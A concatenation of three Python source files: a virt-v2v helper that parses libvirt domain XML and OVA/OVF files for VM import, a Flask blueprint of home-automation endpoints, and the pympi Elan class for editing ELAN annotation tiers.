logging.error("Error looking up vm by id %r: %s", domainId, e)
else:
if vm.name() not in seen:
yield vm
def _add_vm(conn, vms, vm):
params = {}
try:
_add_vm_info(vm, params)
except libvirt.libvirtError as e:
logging.error("error getting domain information: %s", e)
return
try:
xml = vm.XMLDesc(0)
except libvirt.libvirtError as e:
logging.error("error getting domain xml for vm %r: %s",
vm.name(), e)
return
try:
root = ET.fromstring(xml)
except ET.ParseError as e:
logging.error('error parsing domain xml: %s', e)
return
if not _block_disk_supported(conn, root):
return
try:
_add_general_info(root, params)
except InvalidVMConfiguration as e:
logging.error("error adding general info: %s", e)
return
_add_snapshot_info(conn, vm, params)
_add_networks(root, params)
_add_disks(root, params)
_add_graphics(root, params)
_add_video(root, params)
disk_info = None
for disk in params['disks']:
disk_info = _get_disk_info(conn, disk, vm)
if disk_info is None:
break
disk.update(disk_info)
if disk_info is not None:
vms.append(params)
else:
logging.warning('Cannot add VM %s due to disk storage error',
vm.name())
def _block_disk_supported(conn, root):
'''
Currently we do not support importing VMs with block device from
Xen on Rhel 5.x
'''
if conn.getType() == 'Xen':
block_disks = root.findall('.//disk[@type="block"]')
block_disks = [d for d in block_disks
if d.attrib.get('device', None) == "disk"]
return len(block_disks) == 0
return True
def _add_vm_info(vm, params):
params['vmName'] = vm.name()
# TODO: use new API: vm.state()[0] == libvirt.VIR_DOMAIN_SHUTOFF
# when supported in Xen under RHEL 5.x
if vm.isActive():
params['status'] = "Up"
else:
params['status'] = "Down"
def _add_general_info(root, params):
e = root.find('./uuid')
if e is not None:
params['vmId'] = e.text
e = root.find('./currentMemory')
if e is not None:
try:
size = int(e.text)
except ValueError:
raise InvalidVMConfiguration("Invalid 'currentMemory' value: %r"
% e.text)
unit = e.get('unit', 'KiB')
params['memSize'] = _mem_to_mib(size, unit)
e = root.find('./vcpu')
if e is not None:
try:
params['smp'] = int(e.text)
except ValueError:
raise InvalidVMConfiguration("Invalid 'vcpu' value: %r" % e.text)
e = root.find('./os/type/[@arch]')
if e is not None:
params['arch'] = e.get('arch')
def _get_disk_info(conn, disk, vm):
    if 'alias' in disk:
try:
if disk['disktype'] == 'file':
vol = conn.storageVolLookupByPath(disk['alias'])
_, capacity, alloc = vol.info()
elif disk['disktype'] == 'block':
vol = vm.blockInfo(disk['alias'])
                # We use the physical size for allocation because
                # blockInfo can report 0 for the allocation field
capacity, _, alloc = vol
            else:
                logging.error('Unsupported disk type: %r', disk['disktype'])
                # capacity/alloc were never set; bail out before the else below
                return {}
except libvirt.libvirtError:
logging.exception("Error getting disk size")
return None
else:
return {'capacity': str(capacity), 'allocation': str(alloc)}
return {}
def _convert_disk_format(format):
# TODO: move to volume format when storage/volume.py
# will be accessible for /lib/vdsm/v2v.py
if format == 'qcow2':
return 'COW'
elif format == 'raw':
return 'RAW'
raise KeyError
def _add_disks(root, params):
params['disks'] = []
disks = root.findall('.//disk[@type="file"]')
disks = disks + root.findall('.//disk[@type="block"]')
for disk in disks:
d = {}
disktype = disk.get('type')
device = disk.get('device')
if device is not None:
if device == 'cdrom':
# Skip CD-ROM drives
continue
d['type'] = device
target = disk.find('./target/[@dev]')
if target is not None:
d['dev'] = target.get('dev')
if disktype == 'file':
d['disktype'] = 'file'
source = disk.find('./source/[@file]')
if source is not None:
d['alias'] = source.get('file')
elif disktype == 'block':
d['disktype'] = 'block'
source = disk.find('./source/[@dev]')
if source is not None:
d['alias'] = source.get('dev')
else:
            logging.error('Unsupported disk type: %r', disktype)
driver = disk.find('./driver/[@type]')
if driver is not None:
try:
d["format"] = _convert_disk_format(driver.get('type'))
except KeyError:
logging.warning("Disk %s has unsupported format: %r", d,
format)
params['disks'].append(d)
def _add_graphics(root, params):
e = root.find('./devices/graphics/[@type]')
if e is not None:
params['graphics'] = e.get('type')
def _add_video(root, params):
e = root.find('./devices/video/model/[@type]')
if e is not None:
params['video'] = e.get('type')
def _add_networks(root, params):
params['networks'] = []
interfaces = root.findall('.//interface')
for iface in interfaces:
i = {}
if 'type' in iface.attrib:
i['type'] = iface.attrib['type']
mac = iface.find('./mac/[@address]')
if mac is not None:
i['macAddr'] = mac.get('address')
source = iface.find('./source/[@bridge]')
if source is not None:
i['bridge'] = source.get('bridge')
target = iface.find('./target/[@dev]')
if target is not None:
i['dev'] = target.get('dev')
model = iface.find('./model/[@type]')
if model is not None:
i['model'] = model.get('type')
params['networks'].append(i)
def _add_snapshot_info(conn, vm, params):
    # Snapshot related API is not yet implemented in libvirt's Xen driver
if conn.getType() == 'Xen':
return
try:
ret = vm.hasCurrentSnapshot()
except libvirt.libvirtError:
logging.exception('Error checking for existing snapshots.')
else:
params['has_snapshots'] = ret > 0
def _vm_has_snapshot(vm):
try:
return vm.hasCurrentSnapshot() == 1
except libvirt.libvirtError:
logging.exception('Error checking if snapshot exist for vm: %s.',
vm.name())
return False
def _read_ovf_from_ova(ova_path):
"""
    virt-v2v supports OVA in tar and zip formats, as well as an
    extracted directory
"""
if os.path.isdir(ova_path):
return _read_ovf_from_ova_dir(ova_path)
elif zipfile.is_zipfile(ova_path):
return _read_ovf_from_zip_ova(ova_path)
elif tarfile.is_tarfile(ova_path):
return _read_ovf_from_tar_ova(ova_path)
raise ClientError('Unknown ova format, supported formats:'
' tar, zip or a directory')
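# e.g. ova_path may point at 'vm.ova' packed as tar or zip, or at an
# extracted directory containing the .ovf descriptor (paths illustrative)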
def _find_ovf(entries):
for entry in entries:
if '.ovf' == os.path.splitext(entry)[1].lower():
return entry
return None
def _read_ovf_from_ova_dir(ova_path):
files = os.listdir(ova_path)
name = _find_ovf(files)
if name is not None:
with open(os.path.join(ova_path, name), 'r') as ovf_file:
return ovf_file.read()
raise ClientError('OVA directory %s does not contain ovf file' % ova_path)
def _read_ovf_from_zip_ova(ova_path):
with open(ova_path, 'rb') as fh:
zf = zipfile.ZipFile(fh)
name = _find_ovf(zf.namelist())
if name is not None:
return zf.read(name)
    raise ClientError('OVA does not contain a file with .ovf suffix')
def _read_ovf_from_tar_ova(ova_path):
with tarfile.open(ova_path) as tar:
for member in tar:
if member.name.endswith('.ovf'):
with closing(tar.extractfile(member)) as ovf:
return ovf.read()
    raise ClientError('OVA does not contain a file with .ovf suffix')
def _add_general_ovf_info(vm, node, ns, ova_path):
vm['status'] = 'Down'
vmName = node.find('./ovf:VirtualSystem/ovf:Name', ns)
if vmName is not None:
vm['vmName'] = vmName.text
else:
vm['vmName'] = os.path.splitext(os.path.basename(ova_path))[0]
memSize = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
'rasd:VirtualQuantity' % _OVF_RESOURCE_MEMORY, ns)
if memSize is not None:
vm['memSize'] = int(memSize.text)
else:
raise V2VError('Error parsing ovf information: no memory size')
smp = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
'rasd:VirtualQuantity' % _OVF_RESOURCE_CPU, ns)
if smp is not None:
vm['smp'] = int(smp.text)
else:
raise V2VError('Error parsing ovf information: no cpu info')
def _get_max_disk_size(populated_size, size):
if populated_size is None:
return size
if size is None:
return populated_size
return str(max(int(populated_size), int(size)))
def _parse_allocation_units(units):
"""
Parse allocation units of the form "bytes * x * y^z"
The format is defined in:
DSP0004: Common Information Model (CIM) Infrastructure,
ANNEX C.1 Programmatic Units
We conform only to the subset of the format specification and
base-units must be bytes.
"""
# Format description
sp = '[ \t\n]?'
base_unit = 'byte'
operator = '[*]' # we support only multiplication
number = '[+]?[0-9]+' # we support only positive integers
exponent = '[+]?[0-9]+' # we support only positive integers
modifier1 = '(?P<m1>{op}{sp}(?P<m1_num>{num}))'.format(
op=operator,
num=number,
sp=sp)
modifier2 = \
'(?P<m2>{op}{sp}' \
'(?P<m2_base>[0-9]+){sp}\^{sp}(?P<m2_exp>{exp}))'.format(
op=operator,
exp=exponent,
sp=sp)
r = '^{base_unit}({sp}{mod1})?({sp}{mod2})?$'.format(
base_unit=base_unit,
mod1=modifier1,
mod2=modifier2,
sp=sp)
m = re.match(r, units, re.MULTILINE)
if m is None:
raise V2VError('Failed to parse allocation units: %r' % units)
g = m.groupdict()
ret = 1
if g['m1'] is not None:
try:
ret *= int(g['m1_num'])
except ValueError:
raise V2VError("Failed to parse allocation units: %r" % units)
if g['m2'] is not None:
try:
ret *= pow(int(g['m2_base']), int(g['m2_exp']))
except ValueError:
raise V2VError("Failed to parse allocation units: %r" % units)
return ret
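# e.g. _parse_allocation_units('byte * 2^20') -> 1048576
#      _parse_allocation_units('byte * 10 * 2^10') -> 10240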
def _add_disks_ovf_info(vm, node, ns):
vm['disks'] = []
for d in node.findall(".//ovf:DiskSection/ovf:Disk", ns):
disk = {'type': 'disk'}
capacity = int(d.attrib.get('{%s}capacity' % _OVF_NS))
if '{%s}capacityAllocationUnits' % _OVF_NS in d.attrib:
units = d.attrib.get('{%s}capacityAllocationUnits' % _OVF_NS)
capacity *= _parse_allocation_units(units)
disk['capacity'] = str(capacity)
fileref = d.attrib.get('{%s}fileRef' % _OVF_NS)
alias = node.find('.//ovf:References/ovf:File[@ovf:id="%s"]' %
fileref, ns)
if alias is not None:
disk['alias'] = alias.attrib.get('{%s}href' % _OVF_NS)
populated_size = d.attrib.get('{%s}populatedSize' % _OVF_NS, None)
size = alias.attrib.get('{%s}size' % _OVF_NS)
disk['allocation'] = _get_max_disk_size(populated_size, size)
else:
raise V2VError('Error parsing ovf information: disk href info')
vm['disks'].append(disk)
def _add_networks_ovf_info(vm, node, ns):
vm['networks'] = []
for n in node.findall('.//ovf:Item[rasd:ResourceType="%d"]'
% _OVF_RESOURCE_NETWORK, ns):
net = {}
dev = n.find('./rasd:ElementName', ns)
if dev is not None:
net['dev'] = dev.text
else:
raise V2VError('Error parsing ovf information: '
'network element name')
model = n.find('./rasd:ResourceSubType', ns)
if model is not None:
net['model'] = model.text
else:
raise V2VError('Error parsing ovf information: network model')
bridge = n.find('./rasd:Connection', ns)
if bridge is not None:
net['bridge'] = bridge.text
net['type'] = 'bridge'
else:
net['type'] = 'interface'
vm['networks'].append(net)
def _simple_exec_cmd(command, env=None, nice=None, ioclass=None,
stdin=None, stdout=None, stderr=None):
command = wrap_command(command, with_ioclass=ioclass,
ioclassdata=None, with_nice=nice,
with_setsid=False, with_sudo=False,
reset_cpu_affinity=True)
logging.debug(cmdutils.command_log_line(command, cwd=None))
p = CPopen(command, close_fds=True, cwd=None, env=env,
stdin=stdin, stdout=stdout, stderr=stderr)
return p
|
igrlas/CentralHub
|
CHPackage/src/centralhub/server/home_endpoints.py
|
# Endpoints for user to control the home.
from datetime import datetime
from flask import Blueprint, jsonify, request
from services import elements_services, home_services
home_api = Blueprint('/home_api', __name__)
elements_services = elements_services.ElementsServices()
home_services = home_services.HomeServices()
@home_api.route('/profiles')
def profiles():
"""Gets all profiles for all elements for user application to display and manipulate elements"""
return jsonify(home_services.get_profiles())
@home_api.route('/element', methods=['POST'])
def update_element():
"""Updates single element with all new values received from the user application"""
received_element = request.get_json()
home_services.update_element(received_element)
return 'OK'
@home_api.route('/elements', methods=['POST'])
def update_elements():
"""Updates all elements with all new values received from the user application"""
received_elements = request.get_json()
home_services.update_elements(received_elements)
return 'OK'
@home_api.route('/elementdelete', methods=['POST'])
def delete_element():
"""Deletes a single element with given hid"""
element = request.get_json()
home_services.delete_element(element['hid'])
return 'OK'
@home_api.route('/timerules', methods=['POST'])
def timerules():
"""Adds, Updates or deletes time rule for the given element"""
rules = request.get_json()
if len(rules) == 0:
raise Exception("No elements in the list")
for rule in rules:
if 'id' not in rule:
rule['id'] = None
home_services.save_time_rules(rules)
return 'OK'
@home_api.route('/timerules/<string:hid>')
def get_timerules(hid):
"""Gets list of timerules for given hid"""
    timerules = home_services.read_time_rules(hid)
return jsonify(timerules)
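# Client sketch (the URL root and any rule fields other than 'id'/'hid' are
# assumptions, depending on where the blueprint is registered):
#   import requests
#   requests.post('http://hub/timerules', json=[{'hid': 'h1', 'id': None}])
#   requests.get('http://hub/timerules/h1').json()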
|
acuriel/Nixtla
|
nixtla/core/tools/pympi/Elan.py
|
# -*- coding: utf-8 -*-
import time
import EafIO
import warnings
class Eaf:
"""Read and write Elan's Eaf files.
.. note:: All times are in milliseconds and can't have decimals.
:var dict annotation_document: Annotation document TAG entries.
:var dict licences: Licences included in the file.
:var dict header: XML header.
:var list media_descriptors: Linked files, where every file is of the
form: ``{attrib}``.
:var list properties: Properties, where every property is of the form:
``(value, {attrib})``.
:var list linked_file_descriptors: Secondary linked files, where every
linked file is of the form:
``{attrib}``.
:var dict timeslots: Timeslot data of the form:
``{TimslotID -> time(ms)}``.
:var dict tiers: Tier data of the form:
``{tier_name -> (aligned_annotations,
reference_annotations, attributes, ordinal)}``,
aligned_annotations of the form:
``[{annotation_id ->
(begin_ts, end_ts, value, svg_ref)}]``,
reference annotations of the form:
``[{annotation_id ->
(reference, value, previous, svg_ref)}]``.
:var list linguistic_types: Linguistic types, where every type is of the
form: ``{id -> attrib}``.
:var list locales: Locales, where every locale is of the form:
``{attrib}``.
:var dict constraints: Constraint data of the form:
``{stereotype -> description}``.
:var dict controlled_vocabularies: Controlled vocabulary data of the
form: ``{id ->
(descriptions, entries, ext_ref)}``,
descriptions of the form:
``[(lang_ref, text)]``,
entries of the form:
``{id -> (values, ext_ref)}``,
values of the form:
``[(lang_ref, description, text)]``.
:var list external_refs: External references, where every reference is of
the form ``[id, type, value]``.
:var list lexicon_refs: Lexicon references, where every reference is of
the form: ``[{attribs}]``.
"""
def __init__(self, file_path=None, author='pympi'):
"""Construct either a new Eaf file or read on from a file/stream.
:param str file_path: Path to read from, - for stdin. If ``None`` an
empty Eaf file will be created.
:param str author: Author of the file.
"""
self.naive_gen_ann, self.naive_gen_ts = False, False
self.annotation_document = {
'AUTHOR': author,
'DATE': time.strftime("%Y-%m-%dT%H:%M:%S%z"),
'VERSION': '2.8',
'FORMAT': '2.8',
'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
'xsi:noNamespaceSchemaLocation':
'http://www.mpi.nl/tools/elan/EAFv2.8.xsd'}
self.constraints = {}
self.controlled_vocabularies = {}
self.header = {}
self.licences = {}
self.linguistic_types = {}
self.tiers = {}
self.timeslots = {}
self.external_refs = []
self.lexicon_refs = []
self.linked_file_descriptors = []
self.locales = []
self.media_descriptors = []
self.properties = []
self.new_time, self.new_ann = 0, 0
if file_path is None:
self.add_linguistic_type('default-lt', None)
self.constraints = {'Time_Subdivision': 'Time subdivision of paren'
't annotation\'s time interval, no time gaps a'
'llowed within this interval',
'Symbolic_Subdivision': 'Symbolic subdivision '
'of a parent annotation. Annotations refering '
'to the same parent are ordered',
'Symbolic_Association': '1-1 association with '
'a parent annotation',
'Included_In': 'Time alignable annotations wit'
'hin the parent annotation\'s time interval, g'
'aps are allowed'}
self.properties.append(('0', {'NAME': 'lastUsedAnnotation'}))
self.add_tier('default')
else:
EafIO.parse_eaf(file_path, self)
def to_file(self, file_path, pretty=True):
"""Write the object to a file, if the file already exists a backup will
be created with the ``.bak`` suffix.
:param str file_path: Path to write to, - for stdout.
:param bool pretty: Flag for pretty XML printing.
"""
EafIO.to_eaf(file_path, self, pretty)
def to_textgrid(self, excluded_tiers=[], included_tiers=[]):
"""Convert the object to a :class:`pympi.Praat.TextGrid` object.
:param list excluded_tiers: Specifically exclude these tiers.
        :param list included_tiers: Only include these tiers; when empty all
                                    are included.
:returns: :class:`pympi.Praat.TextGrid` object
:raises ImportError: If the pympi.Praat module can't be loaded.
"""
from Praat import TextGrid
tgout = TextGrid()
tiers = [a for a in self.tiers if a not in excluded_tiers]
if included_tiers:
tiers = [a for a in tiers if a in included_tiers]
for tier in tiers:
currentTier = tgout.add_tier(tier)
for interval in self.get_annotation_data_for_tier(tier):
if interval[0] == interval[1]:
continue
currentTier.add_interval(interval[0]/1000.0,
interval[1]/1000.0, interval[2])
return tgout
def extract(self, start, end):
"""Extracts the selected time frame as a new object.
:param int start: Start time.
:param int end: End time.
:returns: The extracted frame in a new object.
"""
from copy import deepcopy
eaf_out = deepcopy(self)
for tier in eaf_out.tiers.itervalues():
rems = []
for ann in tier[0]:
if eaf_out.timeslots[tier[0][ann][1]] > end or\
eaf_out.timeslots[tier[0][ann][0]] < start:
rems.append(ann)
for r in rems:
del tier[0][r]
return eaf_out
def get_linked_files(self):
"""Give all linked files."""
return self.media_descriptors
def add_linked_file(self, file_path, relpath=None, mimetype=None,
time_origin=None, ex_from=None):
"""Add a linked file.
:param str file_path: Path of the file.
:param str relpath: Relative path of the file.
:param str mimetype: Mimetype of the file, if ``None`` it tries to
guess it according to the file extension which
currently only works for wav, mpg, mpeg and xml.
:param int time_origin: Time origin for the media file.
:param str ex_from: Extracted from field.
:raises KeyError: If mimetype had to be guessed and a non standard
extension or an unknown mimetype.
"""
if mimetype is None:
mimes = {'wav': 'audio/x-wav', 'mpg': 'video/mpeg',
                     'mpeg': 'video/mpeg', 'xml': 'text/xml'}
mimetype = mimes[file_path.split('.')[-1]]
self.media_descriptors.append({
'MEDIA_URL': file_path, 'RELATIVE_MEDIA_URL': relpath,
'MIME_TYPE': mimetype, 'TIME_ORIGIN': time_origin,
'EXTRACTED_FROM': ex_from})
def copy_tier(self, eaf_obj, tier_name):
"""Copies a tier to another :class:`pympi.Elan.Eaf` object.
:param pympi.Elan.Eaf eaf_obj: Target Eaf object.
:param str tier_name: Name of the tier.
:raises KeyError: If the tier doesn't exist.
"""
eaf_obj.remove_tier(tier_name)
eaf_obj.add_tier(tier_name, tier_dict=self.tiers[tier_name][3])
for ann in self.get_annotation_data_for_tier(tier_name):
eaf_obj.insert_annotation(tier_name, ann[0], ann[1], ann[2])
def add_tier(self, tier_id, ling='default-lt', parent=None, locale=None,
part=None, ann=None, tier_dict=None):
"""Add a tier.
:param str tier_id: Name of the tier.
:param str ling: Linguistic type, if the type is not available it will
warn and pick the first available type.
:param str parent: Parent tier name.
:param str locale: Locale.
:param str part: Participant.
:param str ann: Annotator.
:param dict tier_dict: TAG attributes, when this is not ``None`` it
will ignore all other options.
"""
if ling not in self.linguistic_types:
warnings.warn(
'add_tier: Linguistic type non existent, choosing the first')
ling = self.linguistic_types.keys()[0]
if tier_dict is None:
self.tiers[tier_id] = ({}, {}, {
'TIER_ID': tier_id,
'LINGUISTIC_TYPE_REF': ling,
'PARENT_REF': parent,
'PARTICIPANT': part,
'DEFAULT_LOCALE': locale,
'ANNOTATOR': ann}, len(self.tiers))
else:
self.tiers[tier_id] = ({}, {}, tier_dict, len(self.tiers))
def remove_tiers(self, tiers):
"""Remove multiple tiers, note that this is a lot faster then removing
them individually because of the delayed cleaning of timeslots.
:param list tiers: Names of the tier to remove.
:raises KeyError: If a tier is non existent.
"""
for a in tiers:
            self.remove_tier(a, clean=False)  # remove_tier() takes no 'check' argument
self.clean_time_slots()
def remove_tier(self, id_tier, clean=True):
"""Remove tier.
:param str id_tier: Name of the tier.
:param bool clean: Flag to also clean the timeslots.
:raises KeyError: If tier is non existent.
"""
del(self.tiers[id_tier])
if clean:
self.clean_time_slots()
def get_tier_names(self):
"""List all the tier names.
:returns: List of all tier names
"""
return self.tiers.keys()
def get_parameters_for_tier(self, id_tier):
"""Give the parameter dictionary, this is usaable in :func:`add_tier`.
:param str id_tier: Name of the tier.
:returns: Dictionary of parameters.
:raises KeyError: If the tier is non existent.
"""
return self.tiers[id_tier][2]
def child_tiers_for(self, id_tier):
"""Give all child tiers for a tier.
:param str id_tier: Name of the tier.
:returns: List of all children
:raises KeyError: If the tier is non existent.
"""
return [m for m in self.tiers if 'PARENT_REF' in self.tiers[m][2] and
self.tiers[m][2]['PARENT_REF'] == id_tier]
def get_annotation_data_for_tier(self, id_tier):
"""Gives a list of annotations of the form: ``(begin, end, value)``
:param str id_tier: Name of the tier.
:raises KeyError: If the tier is non existent.
"""
a = self.tiers[id_tier][0]
return [(self.timeslots[a[b][0]], self.timeslots[a[b][1]], a[b][2])
for b in a]
def get_annotation_data_at_time(self, id_tier, time):
"""Give the annotations at the given time.
:param str id_tier: Name of the tier.
:param int time: Time of the annotation.
:returns: List of annotations at that time.
:raises KeyError: If the tier is non existent.
"""
anns = self.tiers[id_tier][0]
return sorted(
[(self.timeslots[m[0]], self.timeslots[m[1]], m[2])
for m in anns.itervalues() if
self.timeslots[m[0]] <= time and
self.timeslots[m[1]] >= time])
def get_annotation_datas_between_times(self, id_tier, start, end):
"""Gives the annotations within the times.
:param str id_tier: Name of the tier.
:param int start: Start time of the annotation.
:param int end: End time of the annotation.
:returns: List of annotations within that time.
:raises KeyError: If the tier is non existent.
"""
anns = self.tiers[id_tier][0]
return sorted([
(self.timeslots[m[0]], self.timeslots[m[1]], m[2])
for m in anns.itervalues() if self.timeslots[m[1]] >= start and
self.timeslots[m[0]] <= end])
def remove_all_annotations_from_tier(self, id_tier):
"""remove all annotations from a tier
:param str id_tier: Name of the tier.
:raises KeyError: If the tier is non existent.
"""
self.tiers[id_tier][0], self.tiers[id_tier][1] = {}, {}
self.clean_time_slots()
def insert_annotation(self, id_tier, start, end, value='', svg_ref=None):
"""Insert an annotation.
:param str id_tier: Name of the tier.
:param int start: Start time of the annotation.
:param int end: End time of the annotation.
:param str value: Value of the annotation.
:param str svg_ref: Svg reference.
:raises KeyError: If the tier is non existent.
"""
start_ts = self.generate_ts_id(start)
end_ts = self.generate_ts_id(end)
self.tiers[id_tier][0][self.generate_annotation_id()] =\
(start_ts, end_ts, value, svg_ref)
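    # e.g. eaf.insert_annotation('default', 0, 1000, 'hello') adds 'hello'
    # between 0 and 1000 ms on the 'default' tier created by the constructor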
def remove_annotation(self, id_tier, time, clean=True):
"""Remove an annotation in a tier, if you need speed the best thing is
to clean the timeslots after the last removal.
:param str id_tier: Name of the tier.
:param int time: Timepoint within the annotation.
:param bool clean: Flag to clean the timeslots afterwards.
:raises KeyError: If the tier is non existent.
"""
for b in [a for a in self.tiers[id_tier][0].iteritems() if
a[1][0] >= time and a[1][1] <= time]:
del(self.tiers[id_tier][0][b[0]])
if clean:
self.clean_time_slots()
def insert_ref_annotation(self, id_tier, ref, value, prev, svg_ref=None):
"""Insert a reference annotation.
:param str id_tier: Name of the tier.
:param str ref: Id of the referenced annotation.
:param str value: Value of the annotation.
:param str prev: Id of the previous annotation.
:param str svg_ref: Svg reference.
:raises KeyError: If the tier is non existent.
"""
self.tiers[id_tier][1][self.generate_annotation_id()] =\
(ref, value, prev, svg_ref)
def get_ref_annotation_data_for_tier(self, id_tier):
""""Give a list of all reference annotations of the form:
``[{id -> (ref, value, previous, svg_ref}]``
:param str id_tier: Name of the tier.
:raises KeyError: If the tier is non existent.
"""
return self.tiers[id_tier][1]
def remove_controlled_vocabulary(self, cv):
"""Remove a controlled vocabulary.
:param str cv: Controlled vocabulary id.
:raises KeyError: If the controlled vocabulary is non existent.
"""
del(self.controlled_vocabularies[cv])
def generate_annotation_id(self):
"""Generate the next annotation id, this function is mainly used
internally.
"""
if self.naive_gen_ann:
new = self.last_ann+1
self.last_ann = new
else:
new = 1
anns = {int(ann[1:]) for tier in self.tiers.itervalues()
for ann in tier[0]}
if len(anns) > 0:
newann = set(xrange(1, max(anns))).difference(anns)
if len(newann) == 0:
new = max(anns)+1
self.naive_gen_ann = True
self.last_ann = new
else:
new = sorted(newann)[0]
return 'a%d' % new
def generate_ts_id(self, time=None):
"""Generate the next timeslot id, this function is mainly used
internally
:param int time: Initial time to assign to the timeslot
"""
if self.naive_gen_ts:
new = self.last_ts+1
self.last_ts = new
else:
new = 1
tss = {int(x[2:]) for x in self.timeslots}
if len(tss) > 0:
newts = set(xrange(1, max(tss))).difference(tss)
if len(newts) == 0:
new = max(tss)+1
self.naive_gen_ts = True
self.last_ts = new
else:
new = sorted(newts)[0]
ts = 'ts%d' % new
self.timeslots[ts] = time
return ts
def clean_time_slots(self):
"""Clean up all unused timeslots.
        .. warning:: This can and will take time for larger files. When you
                     perform a lot of operations on a lot of tiers, unset the
                     cleaning flags on the individual calls and clean only
                     once afterwards.
"""
ts_in_tier = set(sum([a[0:2] for tier in self.tiers.itervalues()
for a in tier[0].itervalues()], ()))
ts_avail = set(self.timeslots)
for a in ts_in_tier.symmetric_difference(ts_avail):
del(self.timeslots[a])
self.naive_gen_ts = False
self.naive_gen_ann = False
def generate_annotation_concat(self, tiers, start, end, sep='-'):
"""Give a string of concatenated annotation values for annotations
within a timeframe.
:param list tiers: List of tier names.
:param int start: Start time.
:param int end: End time.
:param str sep: Separator string to use.
:returns: String containing a concatenation of annotation values.
:raises KeyError: If a tier is non existent.
"""
return sep.join(
set(d[2] for t in tiers if t in self.tiers for d in
self.get_annotation_datas_between_times(t, start, end)))
    def merge_tiers(self, tiers, tiernew=None, gaptresh=1):
        """Merge tiers into a new tier; when a gap is smaller than the
        threshold the annotations are glued together.
        :param list tiers: List of tier names.
        :param str tiernew: Name for the new tier, if ``None`` the name will be
                            generated.
        :param int gaptresh: Threshold for the gaps.
        :raises KeyError: If a tier is non existent.
        :raises TypeError: If there are no annotations within the tiers.
        """
if tiernew is None:
tiernew = '%s_Merged' % '_'.join(tiers)
self.remove_tier(tiernew)
self.add_tier(tiernew)
timepts = sorted(set.union(
*[set(j for j in xrange(d[0], d[1])) for d in
[ann for tier in tiers for ann in
self.get_annotation_data_for_tier(tier)]]))
if len(timepts) > 1:
start = timepts[0]
for i in xrange(1, len(timepts)):
if timepts[i]-timepts[i-1] > gaptresh:
self.insert_annotation(
tiernew, start, timepts[i-1],
self.generate_annotation_concat(tiers, start,
timepts[i-1]))
start = timepts[i]
            self.insert_annotation(
                tiernew, start, timepts[-1],
                self.generate_annotation_concat(tiers, start, timepts[-1]))
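    # A minimal usage sketch (hypothetical tier names, not part of the
    # original file):
    #
    #   eaf.merge_tiers(['speakerA', 'speakerB'], tiernew='both', gaptresh=50)
    #   # gaps smaller than 50 time units are glued into one annotation whose
    #   # value concatenates the source annotation values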
def shift_annotations(self, time):
"""Shift all annotations in time, this creates a new object.
:param int time: Time shift width, negative numbers make a right shift.
:returns: Shifted :class:`pympi.Elan.Eaf' object.
"""
e = self.extract(
-1*time, self.get_full_time_interval()[1]) if time < 0 else\
self.extract(0, self.get_full_time_interval()[1]-time)
for tier in e.tiers.itervalues():
for ann in tier[0].itervalues():
e.timeslots[ann[0]] = e.timeslots[ann[0]]+time
e.timeslots[ann[1]] = e.timeslots[ann[1]]+time
e.clean_time_slots()
return e
def filterAnnotations(self, tier, tier_name=None, filtin=None,
filtex=None):
"""Filter annotations in a tier
:param str tier: Name of the tier:
:param str tier_name: Name of the new tier, when ``None`` the name will
be generated.
:param list filtin: List of strings to be included, if None all
annotations all is included.
:param list filtex: List of strings to be excluded, if None no strings
are excluded.
:raises KeyError: If the tier is non existent.
"""
if tier_name is None:
tier_name = '%s_filter' % tier
self.remove_tier(tier_name)
self.add_tier(tier_name)
for a in [b for b in self.get_annotation_data_for_tier(tier)
if (filtex is None or b[2] not in filtex) and
(filtin is None or b[2] in filtin)]:
self.insert_annotation(tier_name, a[0], a[1], a[2])
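    # A minimal usage sketch (hypothetical values, not part of the original
    # file): keep only the backchannel annotations of a tier.
    #
    #   eaf.filterAnnotations('speakerA', tier_name='speakerA_bc',
    #                         filtin=['hm', 'uh-huh'])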
def glue_annotations_in_tier(self, tier, tier_name=None, treshhold=85,
filtin=None, filtex=None):
"""Glue annotatotions together in a tier.
:param str tier: Name of the tier.
:param str tier_name: Name of the new tier, if ``None`` the name will
be generated.
:param int threshhold: Threshhold for the maximum gap to still glue.
:param list filtin: List of strings to be included, if None all
annotations all is included.
:param list filtex: List of strings to be excluded, if None no strings
are excluded.
:raises KeyError: If the tier is non existent.
"""
if tier_name is None:
tier_name = '%s_glued' % tier
self.remove_tier(tier_name)
self.add_tier(tier_name)
tier_data = sorted(self.get_annotation_data_for_tier(tier))
tier_data = [t for t in tier_data if
(filtin is None or t[2] in filtin) and
(filtex is None or t[2] not in filtex)]
currentAnn = None
for i in xrange(0, len(tier_data)):
if currentAnn is None:
currentAnn = (tier_data[i][0], tier_data[i][1],
tier_data[i][2])
elif tier_data[i][0] - currentAnn[1] < treshhold:
currentAnn = (currentAnn[0], tier_data[i][1],
'%s_%s' % (currentAnn[2], tier_data[i][2]))
else:
self.insert_annotation(tier_name, currentAnn[0], currentAnn[1],
currentAnn[2])
currentAnn = tier_data[i]
if currentAnn is not None:
self.insert_annotation(tier_name, currentAnn[0],
tier_data[len(tier_data)-1][1],
currentAnn[2])
def get_full_time_interval(self):
"""Give the full time interval of the file.
        :returns: Tuple of the form: ``(min_time, max_time)``.
"""
return (min(self.timeslots.itervalues()),
max(self.timeslots.itervalues()))
def create_gaps_and_overlaps_tier(self, tier1, tier2, tier_name=None,
maxlen=-1):
"""Create a tier with the gaps and overlaps of the annotations.
For types see :func:`get_gaps_and_overlaps_duration`
:param str tier1: Name of the first tier.
:param str tier2: Name of the second tier.
:param str tier_name: Name of the new tier, if ``None`` the name will
be generated.
:param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
no maximum will be used.
:returns: List of gaps and overlaps of the form:
``[(type, start, end)]``.
:raises KeyError: If a tier is non existent.
:raises IndexError: If no annotations are available in the tiers.
"""
if tier_name is None:
tier_name = '%s_%s_ftos' % (tier1, tier2)
self.remove_tier(tier_name)
self.add_tier(tier_name)
ftos = self.get_gaps_and_overlaps_duration(tier1, tier2, maxlen)
for fto in ftos:
self.insert_annotation(tier_name, fto[1], fto[2], fto[0])
return ftos
def get_gaps_and_overlaps_duration(self, tier1, tier2, maxlen=-1,
progressbar=False):
"""Give gaps and overlaps. The return types are shown in the table
below. The string will be of the format: ``id_tiername_tiername``.
For example when a gap occurs between tier1 and tier2 and they are
called ``speakerA`` and ``speakerB`` the annotation value of that gap
will be ``G12_speakerA_speakerB``.
        | The gaps and overlaps are calculated using Heldner and Edlund's
method found in:
